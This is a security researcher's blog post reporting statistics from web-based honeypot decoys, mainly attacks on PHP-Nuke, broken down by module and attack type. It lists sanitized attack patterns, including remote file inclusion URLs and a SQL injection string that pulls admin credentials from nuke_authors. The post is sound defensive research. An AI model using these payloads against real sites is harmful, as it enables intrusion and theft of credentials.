< Web-based Honeypot Decoys: Results I | Call for Paper: 1st USENIX Workshop on Offensive Technologies (WOOT '07) >

Web-based Honeypot Decoys: Results II

Here are some more statistics regarding the data we have collected with the help of Michael Müter's web-based honeypot decoys. PHP-Nuke is the most attractive target, presumably due to it's large number of security vulnerabilities in the past and the large user-base. Commonly, we see file inclusion or SQL injection attempts. These attacks try often to install backdoors written in PHP or defacing tools like the one from r3v3ng4ns.

Attacks per module:
PHP-Nuke: 266 Hits [81.85%]
php Shell: 49 Hits [15.08%]
phpBB: 5 Hits [1.54%]
phpMyAdmin: 5 Hits [1.54%]

Attack Types:
File Inclusion: 167 Hits [51.38%]
SQL injection: 110 Hits [33.85%]
Injection: 30 Hits [9.23%]
WGET 14 Hits [4.31%]
XSS 4 Hits [1.23%]
Defacement attempt: 3 Hits [0.92%]
Directory traversal: 3 Hits [0.92%]

Most often used attack patterns (sanitized):
http://www.XXXzero.com/wp-admin/c.in? : 36 Hits [11.08%]
p0hh0nsee%\') UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/* : 34 Hits [10.46%]
http://XXXzero.com/c.in?? : 33 Hits [10.15%]
uname -a : 18 Hits [5.54%]
http://XXXbergsbuss.se/c.in? : 16 Hits [4.92%]
http://XXX.laughingllamas.com/fileupload/store/check.txt? 5 Hits [1.54%]

Captured Downloads:
Total number of captured tools: 36
Average size of a captured tool: 61.22kb
Total size of all captured tools: 2203.84kb
This entry was posted by Thorsten Holz on Wednesday, May 2. 2007 at 08:32. and is filed under honeynets. You can leave a response, or trackback from your own blog. All new comments are subject to moderation before being displayed.

Trackbacks

Trackback specific URI for this entry

    No Trackbacks

Comments

Display comments as (Linear | Threaded)

    No comments


Add Comment


Enclosing asterisks marks text as bold (*word*), underscore are made via _word_.
E-Mail addresses will not be displayed and will only be used for E-Mail notifications

To prevent automated Bots from commentspamming, please enter the string you see in the image below in the appropriate input box. Your comment will only be submitted if the strings match. Please ensure that your browser supports and accepts cookies, or your comment cannot be verified correctly.
CAPTCHA
 
Submitted comments will be subject to moderation before being displayed.